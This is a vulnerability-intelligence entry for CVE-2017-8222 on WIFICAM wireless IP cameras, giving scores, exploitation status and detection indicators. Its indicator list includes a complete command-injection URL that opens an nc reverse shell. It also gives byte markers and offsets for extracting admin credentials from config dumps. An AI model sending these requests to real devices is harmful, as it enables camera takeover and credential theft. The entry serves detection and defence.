CVE-2017-8222
Published: 2017-04-25
Priority: P2 · 75 · high · 7.5 (CVSS 3.0)
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:N / A:N
Status: ITW · EXPLOIT · VulnCheck KEV (exploited in the wild)
EPSS: 4.22% (89.8th percentile)
Wireless IP Camera (P2P) WIFICAM devices have an "Apple Production IOS Push Services" private RSA key and certificate stored in /system/www/pem/ck.pem inside the firmware, which allows attackers to obtain sensitive information.
Detection & IOCs (extracted from sources)
- URL: `/set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc%20192.168.1.1+1337%20-e/bin/sh)&dir=/&mode=PORT&upload_interval=0`
- Monitor HTTP GET requests to /set_ftp.cgi and /ftptest.cgi on port 80 of camera devices; command injection is delivered via the `pwd` parameter using shell subshell syntax $(...).
- Credential extraction from the device config response relies on a binary marker sequence 0x0a 0x0a 0x0a 0x0a 0x01; credentials (login at offset +138, password at offset +170) can be parsed from the raw binary config dump.
- Presence of /system/www/pem/ck.pem in firmware images indicates the hardcoded 'Apple Production IOS Push Services' private RSA key/certificate; scan firmware blobs for this path during threat hunting.
- Alternative payloads use wget to fetch and execute a remote binary; detect outbound HTTP from camera devices to unexpected hosts following a /set_ftp.cgi request.
- The exploit targets the default credential 'admin'/'admin'; the login can be changed by the user, but the binary config parsing logic assumes 'admin' as the default login to locate the password at a fixed offset.
- An alternative binary marker (0x0006 0x0606 0x0606 0x0100 0x000a) may also be present in config responses; detection logic should account for both patterns.
CVSS provenance
- nvd · v3.0 · 7.5 HIGH · CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- nvd · v2.0 · 5.0 MEDIUM · AV:N/AC:L/Au:N/C:P/I:N/A:N
- vulncheck · 7.5 HIGH
GHSA
GHSA-mjff-gwfw-rfgm: Wireless IP Camera (P2P) WIFICAM devices have an "Apple Production IOS Push Services" private RSA key and certificate stored in /system/www/pem/ck
ghsa_unreviewed·2022-05-13
CVE-2017-8222 [HIGH] CWE-522 GHSA-mjff-gwfw-rfgm: Wireless IP Camera (P2P) WIFICAM devices have an "Apple Production IOS Push Services" private RSA key and certificate stored in /system/www/pem/ck
VulnCheck
wificam wireless_ip_camera_\(p2p\)_firmware Insufficiently Protected Credentials
vulncheck·2017·CVSS 7.5
Affected: wificam wireless_ip_camera_\(p2p\)_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.researchgate.net/publication/348602660_An_analysis_of_the_use_of_CVEs_by_IoT_malware
2017-04-25: Published
Exploited in the wild